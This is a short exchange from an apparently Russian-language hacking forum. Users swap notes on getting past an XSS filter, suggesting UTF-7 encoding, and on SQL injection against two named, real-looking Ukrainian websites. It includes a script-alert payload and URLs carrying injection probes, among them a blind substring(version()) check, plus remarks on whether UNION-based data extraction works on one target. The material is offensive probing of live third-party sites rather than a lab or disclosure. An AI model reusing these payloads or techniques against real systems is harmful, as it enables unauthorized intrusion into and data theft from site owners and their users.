21.02.2010, 06:12
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
неполучаеться обойти xss фильтр
ввожу "'><script>alert(12345)</script>
на выходе "'><script>alert(12345)</script>
Похоже на htmlspecialchars() , его обойти можно только если твоя ксс будет в ссылке с кодировкой UTF-7
http://fitnesslife.com.ua/index.php?id=7647'--+&show=4nalbum&do=showgall&gid=13078
нипанятна, а где скуля ?
http://www.knl.ua/dosug_ss.php?id=63&cat=2+and+substring(version(),1 ,1)=4
А тут 4 ветка, смотри в топ 5 сайтов. Вывести кажись не получиться т.к. там юнион использовать скорей всего нельзя , ну во всяком случае у меня не вышло 
|
|
|